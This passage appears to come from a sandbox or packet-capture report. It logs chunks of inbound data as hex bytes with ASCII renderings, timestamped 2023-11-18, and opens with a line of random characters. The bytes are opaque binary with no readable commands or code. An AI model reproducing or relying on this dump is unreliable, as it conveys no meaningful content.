jUy`+_Bo(%m)Twgn&gm^IFBjy8Zf1Qvj]-`@Zh{>wY6Sy&[qG(<MM:)wJnE%D]W[LEoiuaGO\GV
2023-11-18 09:02:40 UTC	4275	IN	Data Raw: 6c 5c 09 8c bc 26 5e 49 60 04 91 8e 0e 69 6e d2 11 41 bc 97 93 a7 90 8d 2b 23 90 be e8 85 5c 95 68 3e be 7a e2 84 e6 83 22 0e 20 bc 2f 29 5f 67 88 c7 be de 6a 44 6e ee 50 40 45 34 e2 9d 80 80 9f 76 ac e1 13 c6 10 88 a3 8d d5 89 48 97 e1 e7 10 95 88 df 38 57 a8 44 28 2e a7 42 a1 18 bf e7 b1 16 00 dc 66 ba aa b9 57 8a 68 23 b7 4a f9 7d 62 3c f9 7d 20 8e 72 95 17 ca 34 10 89 63 06 43 48 1c 07 56 63 dc 15 45 23 74 25 10 19 1e 91 01 77 3b 3c 02 22 6e 2d aa 55 f7 99 95 fa d2 e1 59 c6 6e 1d 9e 21 a2 6d bc e6 60 12 e6 40 7c 6f b6 af bb 36 db 97 92 d9 78 41 be ee da 21 77 65 a0 b1 46 df 6a bf db 9f 51 b5 c5 a3 51 e8 74 01 c3 eb be a5 e0 ca 37 67 7f 51 a2 0c d2 e6 78 1a f4 7d 7b 7d 73 12 d9 b8 d2 c6 f8 e5 d5 93 36 06 e2 b9 af 69 40 64 e3 af 04 2d 46 36 be 33 f4 ad Data Ascii: l\&^I`inA+#\h>z" /)_gjDnP@E4vH8WD(.BfWh#J}b<} r4cCHVcE#t%w;<"n-UYn!m`@\|o6xA!weFjQQt7gQx}{}s6i@d-F63
2023-11-18 09:02:40 UTC	4291	IN	Data Raw: 8a 44 45 05 19 13 d0 48 1c c7 4f d8 48 32 e8 27 6c 0e f9 09 83 84 73 6f 72 74 7f 9c b3 41 1d cd 63 2d 91 64 d0 f7 d5 1c f2 7d 05 09 0b 6c f7 23 2d b0 1f b2 1d bb 0c 20 0b 3f 1e 3c 46 96 01 2f d3 1f 12 2e 2f 53 92 b1 0f fe f8 d5 05 de 07 1f 32 e6 ee bf 93 c3 73 77 d2 2f f5 67 16 6c 0f 62 87 2d 0e df 9d 89 2c 1c 36 c2 ff c9 02 cf f6 c9 53 f8 2f ee a0 4f e1 41 c6 5a f2 fd 8f 4f 22 09 1f d0 b7 bb 83 c3 fa f6 68 5e c9 db 36 91 38 26 0e 2c fa 06 81 24 7c 41 5b eb aa 96 b5 b5 41 3a 26 a0 91 39 ea b9 8c 02 79 ac 16 f2 73 fe fd e5 93 48 c2 d7 3c 56 16 44 96 b1 c7 b6 b9 18 91 38 22 9d d7 ce 7e 44 3a 2f c9 d8 7d bd 84 6f ab ee 9f 61 86 2e 5c 07 e1 55 ac 0b 0f 72 9d 6d 62 15 3f 80 3e 24 8e 38 9a 57 ab e4 11 67 15 9a 5f 98 c3 e6 17 8f 64 5c 2d cd 51 7d b5 0c 72 e4 db Data Ascii: DEHOH2'lsortAc-d}l#- ?<F/./S2sw/glb-,6S/OAZO"h^68&,$\|A[A:&9ysH<VD8"~D:/}oa.\Urmb?>$8Wg_d\-Q}r
2023-11-18 09:02:40 UTC	4307	IN	Data Raw: ca ff 20 50 3a 0f 1c 99 d8 79 28 24 f1 32 7b 39 05 e8 8e b3 8d a0 38 e5 2e 00 91 9c 63 83 f7 a4 30 b9 a5 c7 2c 0b 13 22 39 e7 5e 86 53 78 2f 03 b7 1b ba 4f c9 88 e4 83 91 55 f5 d6 86 22 ab e2 72 fe 75 8e 9d 88 b2 1e 58 21 9b 02 c5 a8 c7 4a c1 00 aa f9 85 4c 94 3e 26 f6 45 3c 58 4e df c1 ea 13 1f d5 6e c4 a9 28 e6 81 10 84 f3 8c 70 73 6a 61 b2 4c ec dc d9 b9 22 9e 20 00 40 39 bb 23 ea 7a 80 17 27 53 10 dd 7a 50 c8 2d 44 91 0f c8 ba 4f d2 2d 91 7c 30 78 ca ef ca 4a c1 53 02 e4 ed d5 ba 7f fe df c7 48 29 30 11 1e 1f 8f a6 09 ac 83 4f 17 25 52 71 7b e1 59 02 75 f9 d8 72 bb ca ca fb 0c ab bb 60 c5 92 af 1a 51 d7 83 79 3e 26 88 94 e2 2a 83 3e 51 e8 41 39 25 03 ca 2e 0a 5d e3 73 5f 8d 28 2b 78 81 f6 e4 52 5d 8f 96 32 e3 a2 d6 ef 4f 3d 78 b5 94 d9 72 ef c7 79 d3 Data Ascii: P:y($2{98.c0,"9^Sx/OU"ruX!JL>&E<XNn(psjaL" @9#z'SzP-DO-\|0xJSH)0O%Rq{Yur`Qy>&*>QA9%.]s_(+xR]2O=xry
2023-11-18 09:02:40 UTC	4323	IN	Data Raw: da f8 8b 2a 24 da 78 8b 27 e7 e7 4e ac 68 58 5c e6 e3 0c 1a aa b0 27 ea 1f 3f 55 a1 27 aa b5 b2 b8 ec b4 54 91 bb 96 4e 1c 55 cb 50 be 24 19 3f 91 d3 9b 14 15 f6 18 fc 88 8a 1b 5d dd f4 16 71 d2 70 6f ba 7f 83 74 76 2d 1b 61 de 70 4a e9 6b f9 78 21 8f d0 85 0a 59 b3 fd bc e6 76 a6 13 6d 74 57 41 b0 ab 2e 15 c4 5b 84 0a 42 f7 6e 97 0a e2 31 0f f1 72 33 74 a9 20 de 22 22 f6 ea d2 f6 a9 7f 38 0b 92 98 6f 38 10 5b 8c 22 76 00 e9 7a 8c 27 72 8c 90 38 dc d1 33 a0 94 13 87 3b b0 22 cc b7 0f 88 c3 1d 88 8d ab 23 1f 5b 73 83 36 20 5d d0 5d 62 c4 16 f3 1b f9 07 49 4b 15 ab 3c 9c 21 39 b6 a0 48 39 13 46 88 24 bd 96 4c 64 9c 2f 99 90 1c bf c5 5e e6 06 20 75 d5 cb 4b bf 29 15 ae 15 47 2b 6f 9f 29 4d 83 4d 1f 46 ac 33 38 d1 c6 ea a9 4b 75 a2 8d 95 e1 69 49 ea 0a 8e 40 Data Ascii: *$x'NhX\'?U'TNUP$?]qpotv-apJkx!YvmtWA.[Bn1r3t ""8o8["vz'r83;"#[s6 ]]bIK<!9H9F$Ld/^ uK)G+o)MMF38KuiI@
2023-11-18 09:02:40 UTC	4339	IN	Data Raw: 73 33 37 ae a3 b8 57 f7 f7 2b 13 c0 15 a7 fa dc 5f 39 f8 35 c4 f7 e3 82 6c cd eb b8 22 5b 9f 8b 7d 14 1f 86 ab 7d d4 b9 a8 c9 1a 5c 00 a0 b0 ea 82 9e cd 2b bf a2 67 9f 3b 4a 9c 0c 10 cd 9d 25 43 13 10 75 cc 12 28 07 a4 1e 85 85 6d 88 37 f1 82 85 ad 1e 62 61 9f 5b 59 d8 27 33 98 9d 5b ca bb 02 f1 3f bf 60 61 73 a6 be 62 61 df 5f 29 d6 ea d4 8c 1f 1b b2 3c 9f a3 16 0d 88 c0 8e d5 00 e8 b0 61 e5 57 df cd b4 63 4f 2c f3 2e d0 8a 86 59 e2 64 80 38 d4 ca 42 91 8e a8 bc 54 71 75 14 43 7d 20 5b c7 64 09 14 43 7d ab d0 0a 80 62 a8 0f fe 41 f5 90 7f f0 7e a7 1c b1 1a 8a ff fc 7e 37 2b 35 39 8a 9b d8 ac 40 0e a3 58 81 42 79 ab fe c1 9b b9 c2 6e 83 7f 90 43 35 f9 07 9f 98 39 fb 1d 85 b9 cd ca cf f0 d9 05 0a 73 5b 2f 1f db 60 c4 70 a8 51 b2 27 01 51 b9 fb 07 ff f2 47 Data Ascii: s37W+_95l"[}}\+g;J%Cu(m7ba[Y'3[?`asba_)<aWcO,.Yd8BTquC} [dC}bA~~7+59@XBynC59s[/`pQ'QG
2023-11-18 09:02:40 UTC	4355	IN	Data Raw: 2e 77 d0 a2 89 b2 55 50 6e 61 cf d7 ff 53 75 25 3b d8 c4 38 f1 fe 3f cd d7 d9 73 06 a1 41 6c 23 96 41 f0 fe 0f 42 5c 76 95 cd 2d a5 28 b1 93 4e 67 b5 cb 64 6e 79 c9 f9 2b 13 f2 22 dd ca 4b 16 7f 1c 47 d4 ca ee 3f 83 68 c6 11 4b d8 f5 60 36 90 76 00 96 5c 65 92 59 47 6b d4 2a 37 2c 8e 58 15 6e 58 7c 3b 08 c4 76 ec 5f ba f0 39 8a 12 bb 3c f7 3b 3a cc c8 08 2e 40 fc b4 bb 10 b4 38 8a 06 3a 7b eb 5f 62 29 12 7b eb 4b 8e 34 c6 03 e2 8f b3 47 5d 07 f7 d0 3a b8 8b 3f 8e 23 aa 8b 57 7d 55 c5 57 fd 65 2f 2c 3d 87 cf 3e 5a 07 b7 9d d0 f5 1b ec ab ff dc b9 58 25 e3 ea 3f df f7 94 2f b8 f9 dc 6f 77 97 69 d6 e3 28 b4 72 2e 56 ca 10 17 ab 79 b4 8c 99 3f a7 e8 50 5f 12 e4 29 6c f9 21 79 8a 31 6a 24 73 bd 23 56 85 57 7d c9 d8 5a 52 4f 89 e0 e2 88 32 ca e3 bd 23 56 05 56 Data Ascii: .wUPnaSu%;8?sAl#AB\v-(Ngdny+"KG?hK`6v\eYGk*7,XnX\|;v_9<;:.@8:{_b){K4G]:?#W}UWe/,=>ZX%?/owi(r.Vy?P_)l!y1j$s#VW}ZRO2#VV
2023-11-18 09:02:40 UTC	4371	IN	Data Raw: 88 f5 20 db a2 ab 9c 62 2f 55 76 20 1a ff 4c 0b 02 88 c6 e1 5d fa 53 15 da a4 ee 66 a9 c7 81 68 bc d9 d7 36 10 bb 82 1c dc 25 fd e1 5f c0 51 0d cb 02 05 c4 ae 40 70 d1 cc 45 70 39 c5 51 07 42 40 9c 07 08 2e 6a 21 82 cb 0c 57 aa 5d 92 cd dd eb d9 c0 3f c5 5d 02 7a 59 31 eb c5 02 d4 6e 05 a8 24 f7 1f 05 b4 58 31 cb 9d 89 ff 26 6d 74 db 72 02 b1 ab 61 5b 4e a0 71 2b 96 a5 f8 04 62 0b a7 79 00 b1 c5 7e ca 13 07 c4 79 6c 53 44 00 e2 70 9d e6 11 e8 5e dd f5 80 e6 71 df 38 40 2f 2b 76 85 78 00 dd 51 3d 70 5a fc 9d 2d e4 b4 58 cf 63 52 3b 40 ec ea b1 54 d7 40 77 54 8f 2b b2 05 e2 8d 7a 5c 91 0d 88 36 5e db 59 02 d1 06 88 21 f7 00 02 88 c3 85 ff e3 fe d5 90 ea 85 36 5a 9c f5 dd 07 00 10 6d c0 31 22 e3 72 8c 9c 62 ec 45 ef d3 07 88 f3 70 d5 b7 40 8d 36 20 ee a6 99 Data Ascii: b/Uv L]Sfh6%_Q@pEp9QB@.j!W]?]zY1n$X1&mtra[Nq+by~ylSDp^q8@/+vxQ=pZ-XcR;@T@wT+z\6^Y!6Zm1"rbEp@6
2023-11-18 09:02:40 UTC	4387	IN	Data Raw: be 4a 68 5b 88 3e a6 72 21 25 52 af e2 8e d3 b5 3a 53 13 d9 e9 74 8f 85 e8 7c 6a 93 b5 10 bb db 54 c7 42 2a 18 bd 48 5d ff cf d4 b5 24 51 6e e3 c8 7d 9d 46 e2 9f cb b6 dd 31 e3 e8 ae 09 47 8f a7 ee 7f 94 11 12 99 00 76 c8 c7 20 41 4a 7c 14 00 e2 23 e3 32 c8 5b 0e 64 d9 90 07 9c a6 f3 40 3e 32 15 83 8c dc b8 44 4d 0d 91 1b 97 e8 b0 61 be f9 e7 3c 2a 6d 6f e4 7a 47 fc cf 81 06 1b 6e 4b f1 1c c8 67 65 a1 dd b9 a9 11 e8 cd a1 bc 24 bc 7a a8 24 bc 91 2d 02 d9 88 38 2b 37 15 ff 54 8f 2e a9 ef b8 45 38 86 a2 45 d8 48 c4 3b 6b ba 2a f0 6e 24 ca b5 ff 52 8f 25 e1 ee b4 b7 88 6a 47 26 56 23 cd 62 1e 43 35 16 e7 01 39 f3 d5 02 71 ba 16 b0 9e 0f d1 02 d6 c9 dc 4d ac d1 83 26 56 90 26 aa f1 8f 73 64 62 35 72 af 3c 4b 8e 0c a6 46 c2 2e 1a b3 3a da 70 9f 86 1b 4e b7 44 Data Ascii: Jh[>r!%R:St\|jTBH]$Qn}F1Gv AJ\|#2[d@>2DMa<mozGnKge$z$-8+7T.E8EH;k*n$R%jG&V#bC59qM&V&sdb5r<KF.:pND
2023-11-18 09:02:40 UTC	4403	IN	Data Raw: 32 e5 b9 c5 5e f6 6b 81 48 5e f2 7f 38 22 79 c9 c3 0b c4 cb ee 79 78 d5 2b c5 c3 dd 51 51 be 4b 80 78 a0 ae d0 1b e2 48 6c 27 0d d1 1d 45 af 3a 34 71 1c 0c 5d 9a b8 d5 2d 80 5b 0f 4e 97 26 ce bd 4d 74 1e ca c3 db 56 af 2b f4 4b 79 78 a1 25 cf 4f 67 d3 92 73 ec f6 51 3e 71 80 d8 2b fb 36 d4 f3 21 7f 9f 5b dc 99 30 c0 11 c9 f7 2c 83 41 e9 76 ad b8 cb 60 e8 8a 87 5b 1d a9 44 e2 bd 6b 88 97 7d 3c e9 ea e8 28 9a 1a bd 7c 7e 18 e2 10 1d a3 7c 7e 00 05 c7 58 69 53 e2 28 2e e2 c0 5a f8 9f 7f 7c 09 4d 1e 28 df ed 4b fe 3e 56 2c 6b e1 4b 09 7a 6d 18 96 f5 12 43 1c 89 f3 53 62 52 81 a2 57 b3 8a e5 80 a2 a9 d9 33 63 3a 10 87 cf 74 e9 5b 90 4f 49 df d6 ac 0a 37 a0 e8 ee 84 c2 2d 66 c2 40 71 82 0b 42 36 d6 58 12 b2 ad 55 1c 7b 81 48 be ea 5a 38 10 9b 7a 66 79 c3 2d 49 Data Ascii: 2^kH^8"yyx+QQKxHl'E:4q]-[N&MtV+Kyx%OgsQ>q+6![0,Av`[Dk}<(\|~\|~XiS(.Z\|M(K>V,kKzmCSbRW3c:t[OI7-f@qB6XU{HZ8zfy-I
2023-11-18 09:02:40 UTC	4419	IN	Data Raw: 41 c2 f4 fb eb 48 54 dc 00 8b 89 65 d8 62 12 e4 3e e2 10 69 12 3b 6b 4e 6a 12 bb 77 b8 87 c4 0e 67 e1 a9 2f 79 48 44 6d f9 39 fa d0 11 a7 2e 2a 20 cc 91 0a 88 48 79 19 5b 9f 39 86 b7 be 87 0c 77 aa cd 51 8b e7 0a ee 54 f9 9f c3 9d 4a 0d d8 2c 3f dc 95 37 cb e7 cc 06 67 6e cb 98 b7 37 cb 35 db 36 3b 11 a9 2b ea 00 92 63 e5 5c 2d e4 81 f4 4a 5c 57 f7 f2 59 28 1a e8 ae d6 2d eb d2 43 22 81 91 bb 5a 4d bb 68 3b cf 6b db 8a 88 ba 1a 22 dd 82 38 88 aa 1a 22 0b 99 94 03 44 ee 6a ec cb 0f 92 0b 72 95 20 7d f7 1c 5a 89 44 93 0d 15 b9 58 79 8c 02 9a e2 a8 48 c3 f0 c9 0d 4c c3 00 12 5b 1f 9f 9c 88 c3 6d 0d 7a 6a aa db 88 24 a3 b7 6d e6 20 12 c7 60 ad df af 47 22 71 4c e8 45 b9 da 81 aa 46 35 51 5b 96 1b 32 91 46 b5 5e d6 2e 11 e7 aa 9f 70 d3 e5 e1 8e 88 c2 fb c5 34 Data Ascii: AHTeb>i;kNjwg/yHDm9.* Hy[9wQTJ,?7gn756;+c\-J\WY(-C"ZMh;k"8"Djr }ZDXyHL[mzj$m `G"qLEF5Q[2F^.p4
2023-11-18 09:02:40 UTC	4435	IN	Data Raw: 65 68 72 55 67 59 44 c4 9e 17 06 fe b1 0d 07 fe 79 c4 70 d8 da 59 22 1c b6 64 63 c5 da bd 2f 2d 48 ad 5a 99 a8 de a4 21 e1 1a 99 2e 54 ae 91 8d 2b 96 8d ef b4 11 a4 7e 44 16 45 af 91 89 86 14 f1 92 e2 93 41 b4 ac c0 0c f9 9f 57 52 93 82 33 e4 af af 24 97 38 ee df 24 dd d4 b1 e2 79 e7 58 81 aa 15 c3 a7 07 44 cb 8a 6d 6f 2a 91 8c 17 c6 48 71 55 5a a7 86 b8 c7 e9 47 d1 07 56 88 d5 19 0b 45 cb 25 ea 3e f7 2e c8 ad ba 1d 20 d2 64 e3 f0 56 4f 1b f2 56 87 98 1b 3c 22 57 d5 fa 87 d1 2d 9a d0 47 1c ac e6 cc 40 26 56 b5 6e 38 ca e9 42 05 71 10 23 19 c0 b0 af b3 08 25 62 17 c1 b9 b0 4d 30 1e e1 5a a7 bd 0d 45 30 5e 3b a3 6c b2 2a 12 aa aa cf 37 98 93 e7 9a a4 b8 77 6e b2 92 78 ef 56 85 10 c1 93 5a a4 12 7d 3b 0c b5 a8 a9 04 ea d2 90 90 54 82 a7 b0 f9 64 00 d9 06 ea Data Ascii: ehrUgYDypY"dc/-HZ!.T+~DEAWR3$8$yXDmoHqUZGVE%>. dVOV<"W-G@&Vn8Bq#%bM0ZE0^;l7wnxVZ};Td
2023-11-18 09:02:40 UTC	4451	IN	Data Raw: 60 ab 56 42 6c c7 c5 ac b8 25 91 1c b9 3b 9c c4 cb 15 31 48 12 b0 7f c0 17 fc bc 15 1a 62 e8 b9 ff bf 17 31 9a cd 61 e8 23 8e b1 fb cd 12 79 bc 87 5b 39 7c 1c 4b a2 cb 23 17 a4 9e e2 3f fc bb 05 e9 0b de cb 18 2d fb d5 57 42 92 98 0c fe 99 76 10 49 c7 5d 71 6c 6b df 5f b6 42 6c e0 74 4e 24 49 cc e4 44 42 e0 1c de 99 ba e5 42 d4 81 cc 77 67 de 26 8c 54 d4 81 97 3f 1f 33 8c d8 57 30 6d 2c a3 42 21 fd ce ef 0f d9 ea 46 d8 48 3a ce 4e 1b 61 35 50 88 ed c0 86 ba 76 e1 40 cd eb 07 3c 22 1e 2b 93 a5 d0 10 03 59 23 6d 22 68 34 c5 58 95 fc d0 68 ba a8 35 ce eb 59 14 90 8a da e9 2e 15 09 a2 2e 86 c2 75 59 62 77 b8 2e 90 0a d7 15 09 87 eb 22 49 1b 96 48 34 db b0 dc a4 e2 78 45 c2 71 bc 40 76 fe 3e 78 b1 65 e4 a2 10 75 aa 1a 48 34 cd a0 d7 56 74 d8 6b 0b 24 43 4d c9 Data Ascii: `VBl%;1Hb1a#y[9\|K#?-WBvI]qlk_BltN$IDBBwg&T?3W0m,B!FH:Na5Pv@<"+Y#m"h4Xh5Y..uYbw."IH4xEq@v>xeuH4Vtk$CM
2023-11-18 09:02:40 UTC	4467	IN	Data Raw: a0 20 3f 84 16 62 27 c6 55 fa bc 2d 01 14 2d 8f 60 3b b7 83 63 1b 2d 32 06 ae cf 20 21 d4 fe 8b f6 dc 92 91 29 88 d0 c0 1a e9 f8 5e 0e 86 26 34 c0 28 83 3f 83 5f ae 44 45 8c e9 d8 d1 46 54 fe 2c 9c d3 0e e3 42 54 5e 36 06 83 25 b6 06 43 90 23 77 32 44 85 b5 aa bb 8d 23 01 44 89 36 5e b7 77 7d 44 83 12 bd 20 ec 18 5e f0 08 b1 1d 7d 63 f1 52 03 81 d8 8e 81 e4 b2 d6 01 c4 76 3c cb 58 98 d5 31 ef 0a 51 f9 b3 20 66 bc 0c 21 16 f5 9c 2b 90 36 f8 eb 95 08 45 dd f7 3a 67 03 21 d4 ea 2e 0d 2b 0e a6 70 21 14 75 b7 16 7e b0 fa b4 81 b8 fd 88 17 8e 67 eb 2c c4 a2 3a ee e8 b8 23 13 6a 62 e0 b6 8f 5f 90 e1 f4 55 14 4c db 56 0e 24 09 86 37 77 51 0a 6f 1e d6 f2 ba 63 93 8a 65 42 88 0d 9c 13 01 73 24 b1 bc 93 09 87 e4 3b 9f a5 09 b1 a8 4d d7 6c b5 63 db 35 3b fc 85 4b 5e Data Ascii: ?b'U--`;c-2 !)^&4(?_DEFT,BT^6%C#w2D#D6^w}D ^}cRv<X1Q f!+6E:g!.+p!u~g,:#jb_ULV$7wQoceBs$;Mlc5;K^
2023-11-18 09:02:40 UTC	4483	IN	Data Raw: 3b e4 fe 0d 32 de 9f e7 ef a1 38 f4 20 a7 a3 6c 12 e5 0f 05 bf 70 77 d1 2e bf 70 90 57 db 5d b4 fb 56 26 c8 b8 95 71 bf ea be 95 09 72 3e 7f 41 45 42 08 72 87 f2 15 b2 0e 98 c2 dc a9 fb ca 3d 43 5f f9 9a 43 48 3a 78 b1 ee 69 c9 17 eb 20 d7 e3 87 1a af dc 1a f0 21 82 6b e5 87 08 20 fb 63 17 3e ce dc 01 8c 78 93 9b ca c7 99 3b 80 11 cf 9f 73 3d 1f 25 77 00 23 8c 48 39 06 47 c9 1d c0 c0 85 b4 db 6a 94 dc 01 8c f2 dc 01 8c 92 3b 80 81 6b 59 ff 82 e3 ca 1d 00 2d 2c fe 05 d3 c2 12 e4 78 2c 45 c3 77 5e 41 ae c7 52 34 f4 20 2f c8 5a 1e 1b fa 51 73 cf 30 c2 bf 61 b7 6e cd 3d c3 68 cf 1d 80 1f 6d 80 1c 63 6f 84 47 cb 85 7e f4 8c 54 28 e4 ea 22 a6 93 47 ed e8 b9 03 18 bd 3d 46 6d 20 eb 40 b0 27 8f 8f a1 60 4f 41 c2 c8 91 12 36 72 04 b9 2d 77 44 d6 31 f2 39 b0 90 75 Data Ascii: ;28 lpw.pW]V&qr>AEBr=C_CH:xi !k c>x;s=%w#H9Gj;kY-,x,Ew^AR4 /ZQs0an=hmcoG~T("G=Fm @'`OA6r-wD19u
2023-11-18 09:02:40 UTC	4499	IN	Data Raw: 23 ee fa dc 57 5d 26 b4 03 97 11 8f 76 74 1f 7e 86 e2 8b fa 1f 74 7c 51 64 a2 dc fb 12 22 15 85 1d 7d 16 35 5e 9e 38 e1 b9 74 dd d9 89 c3 ef 83 8b 0c cb eb ec f6 b8 c4 91 f2 11 31 ba fe f3 d7 ff 1d 89 a4 7c d4 fd e0 46 64 e5 77 dc e2 68 f5 01 b2 f2 16 77 32 5a 19 80 ac 3c 6e 97 b6 72 b9 2e 80 7c ac 3e 75 e4 ea 83 38 a7 a7 3f db 19 f5 14 24 de bc be 1c 89 5c ab d8 b8 3f 24 74 27 13 de b1 f1 50 95 0d 94 71 7d 04 83 80 f3 a2 7b 77 ca 79 31 48 bc a5 7e 55 03 a7 df 52 11 4c e2 31 6b a7 12 6a 04 09 57 44 7d 07 81 ac 03 a1 b4 dc 89 b3 fa 23 5c d7 a6 b8 3f 94 df fe 72 d6 f5 55 8a 97 51 2b 6f c3 e3 6a 22 b1 ad bb 7d 2a b1 6d 90 30 42 78 7b 3b 12 a9 e5 13 61 8f 3f bb ba 0a 7b 3c e2 40 37 f7 9e 01 a8 88 01 c7 42 cd 0f a0 26 46 18 f6 f8 af 45 0c e3 97 18 91 dc c9 bd Data Ascii: #W]&vt~t\|Qd"}5^8t1\|Fdwhw2Z<nr.\|>u8?$\?$t'Pq}{wy1H~URL1kjWD}#\?rUQ+oj"}*m0Bx{;a?{<@7B&FE
2023-11-18 09:02:40 UTC	4515	IN	Data Raw: 54 15 0e 5b c8 5d f3 65 2b a4 56 4d 69 39 2d 63 46 cb b9 fe 9f 0c 43 ed aa 80 2c 63 2a 19 8c 7f a8 99 64 30 eb b4 81 c0 5f e1 20 d2 e8 e2 a1 b0 4c 9a 8d d8 2a 28 19 2a 8e b0 11 3b 28 03 88 6c 90 f0 a2 f1 d1 f9 ea cc 92 2d d5 8b d1 34 61 d4 db dd bc ea a5 1a 45 ce 44 0d 3b cc de bc fa 5c 48 50 70 3a 84 88 d1 61 02 4d b9 7e b3 8c dd a6 5c 28 72 8a 52 87 0c 64 a3 74 14 71 94 91 1a 77 a1 78 61 b3 58 f6 57 46 e6 38 de 66 22 91 c7 aa 1f 9c 89 df fe 6f 2b 14 8e 51 7e a9 40 56 8b ac a2 0c 7b d3 c1 33 a7 d7 ab cb f0 fd e7 37 11 62 df 8e e2 e3 f6 0f e4 1b 24 8a f4 c7 c9 90 24 c1 22 8a 98 4e d5 dc 24 3f 44 11 9b 75 09 4f f2 43 16 19 96 ef 1f 13 6a 32 ac c3 00 43 6f fc b9 15 ea 21 54 d6 37 23 57 25 33 dd 4f ee c7 65 83 3f 14 7b 85 df 34 0a c7 a8 f8 bb 46 1e 44 24 2f Data Ascii: T[]e+VMi9-cFC,cd0_ L(*;(l-4aED;\HPp:aM~\(rRdtqwxaXWF8f"o+Q~@V{37b$$"N$?DuOCj2Co!T7#W%3Oe?{4FD$/
2023-11-18 09:02:40 UTC	4531	IN	Data Raw: d9 d2 2b 22 bd 92 a5 5b 5b b0 7d 82 f8 4a e0 08 4f b5 9b 20 31 1e 43 bd fb 22 74 10 9f e3 c4 47 57 9f 9a d0 08 03 de a8 5f 7e 7e 15 2a 09 26 69 fd ef ab 50 37 83 91 fd 7f fb ed 15 a4 07 3c 2f ec 38 76 53 de 7f 88 5c ce 93 1a e4 a6 b4 31 49 53 de 98 88 ec 4e f8 1c 34 c2 c0 48 dc 12 1e 89 20 31 12 b7 c4 ca 73 68 c7 52 12 da b1 90 e4 32 51 dd f5 32 41 b2 8f 0f 89 ee 71 05 12 8e df d2 d1 d7 9d 5e 71 c7 52 12 da b1 90 a4 b3 a6 74 c8 59 03 52 61 a1 d8 98 08 79 ca 38 af 8b 15 a7 fc 0f 12 59 e2 be 92 86 3a c8 dd bd 39 4a a2 e3 ae 51 72 a9 06 4f ba eb 1a 3c 24 ef f6 31 18 ee bb e5 ed de 3c e1 4d af 6e 9d f0 82 d4 bc 9b a6 6a de 7d 48 de 00 fd 72 77 a7 6e 80 92 c4 6e 6d 4b a8 42 37 48 dd 96 fd d3 dd f5 6d d9 67 f5 3e 66 45 21 05 b1 57 88 b1 5b 35 21 0b 51 e2 31 3d Data Ascii: +"[[}JO 1C"tGW_~~*&iP7</8vS\1ISN4H 1shR2Q2Aq^qRtYRay8Y:9JQrO<$1<Mnj}HrwnnmKB7Hmg>fE!W[5!Q1=
2023-11-18 09:02:40 UTC	4547	IN	Data Raw: 9e 19 aa 9c 5a 01 35 31 f2 36 dc 48 12 27 fa 9e 11 75 0c 06 d9 93 c4 50 90 bd 20 ef 62 33 ae 11 ab 3b 18 19 cf 12 8a 8c 17 64 cf bb 6d 23 49 44 88 b5 23 a1 80 6b b8 3b c9 ec 5c 46 aa d5 c9 58 28 a4 de 7d 76 79 9f d3 0e 20 4a 4c e4 84 b7 04 10 75 44 e4 e9 33 65 04 d2 94 c1 90 59 3c 2e 05 ca d9 67 46 e0 37 6f 0d 88 d8 89 eb d8 c8 02 95 ee 01 c7 c7 96 c9 c0 63 4b 32 66 bf 73 cf 40 c4 a2 f6 44 0e 05 49 04 52 ad 36 63 53 49 62 2b 36 d5 46 9c 0f 5f de 1b 99 b1 7c d3 20 c4 a2 a2 7f 5a 8e 76 a2 42 c6 b3 c5 ce d1 4e 84 ea e2 46 20 37 a9 44 45 0c e4 8a ff e7 4f 57 a2 66 06 56 b5 7f 5c 89 86 18 30 d6 e0 b8 44 c4 e9 35 0c ff 9f 4f 2a 2f 72 88 0d b2 f6 b3 17 25 a2 8e 88 7b 9f eb 07 51 d4 ea f9 8d 4a c9 06 0a 25 63 78 fd 10 5a 62 d4 dc fb 00 71 ef 03 b2 c9 42 6f 34 c4 Data Ascii: Z516H'uP b3;dm#ID#k;\FX(}vy JLuD3eY<.gF7ocK2fs@DIR6cSIb+6F_\| ZvBNF 7DEOWfV\0D5O*/r%{QJ%cxZbqBo4
2023-11-18 09:02:40 UTC	4563	IN	Data Raw: a7 53 ec 8f f7 47 22 09 0f 6f d7 23 83 be af 24 a1 3e d3 7f b0 d3 f7 95 64 e8 aa 53 38 7d 5f 49 3a 05 79 22 cb 80 ef 6b 72 2c 9f f4 3b 7d 5f df d5 5c fa be 92 2c 4a 65 98 48 c2 e9 fb fa 4b ad a2 ef 2b 49 98 d6 59 06 7d 5f 49 42 db e7 7e d0 f7 15 24 7d 5f dd 5c fa be 92 44 b6 1b 0b 6f c8 76 43 72 d6 b3 5f 75 fa be 92 84 ef ab d6 6e a7 ef 2b 48 fa be 7a 3e e8 fb 4a b2 b6 73 f0 ea f4 7d 25 09 df d7 cf 1f 1f 46 fa 73 f6 ee 50 d7 89 24 1c 17 f4 6c 2e 5d 5c 49 c6 59 c6 ff 73 20 73 14 99 6c 26 32 47 7c f0 b2 55 03 8f b2 22 1b 5d f8 12 0d 17 cc eb 3a 55 c1 8d 96 24 dc 68 df cd d1 7d f3 8a 98 5e 67 4f 04 72 ab f6 3a 47 b5 4e 37 5a 90 74 a3 d5 95 4c 59 43 49 3a 71 67 22 09 0f 6b ca d3 0f 7a b2 82 c4 5d 3f 39 e8 65 4a 72 95 97 b1 a2 97 29 49 a7 3f 4e 54 5c d0 47 9e Data Ascii: SG"o#$>dS8}_I:y"kr,;}_\,JeHK+IY}_IB~$}_\DovCr_un+Hz>Js}%FsP$l.]\IYs sl&2G\|U"]:U$h}^gOr:GN7ZtLYCI:qg"kz]?9eJr)I?NT\G
2023-11-18 09:02:40 UTC	4579	IN	Data Raw: 5d 09 01 99 39 72 9e 49 ca 00 32 f3 c8 48 95 8b 3a ae 58 cc 1c f9 5e bd e9 8f e1 2b a1 67 0b 6c 63 ff b5 81 f4 28 26 b4 35 f3 69 97 82 87 8c 2c df 39 f3 59 ac e3 3c 9b 60 af fb 25 ce db 3a 4e a4 a4 1f f6 48 21 d2 3c 66 c4 e4 e6 2b 99 cd 1a 0b 6e 84 d6 e6 d1 ad b1 3c ff d2 c8 30 41 22 33 47 02 8a 64 3e ad 98 94 89 2c b4 5e 25 73 59 31 79 94 fe 97 62 02 24 e6 0b f9 e1 24 40 22 eb 98 98 af f2 ba 19 05 12 f3 15 1e c3 f9 12 d7 6d c5 a4 20 d9 4b 7e 06 cb 0e 02 b5 44 80 fc 8b 79 b3 62 12 97 5c 5b 77 c6 95 97 99 8f d7 cd 0f 90 99 43 d5 97 32 8a da d2 ee f1 ff 54 5d cb b2 e5 b8 91 db df 6f f1 e2 f0 4d 2e db 8f 28 97 ab da e3 89 ee 76 84 e7 ff 3f 64 98 c8 04 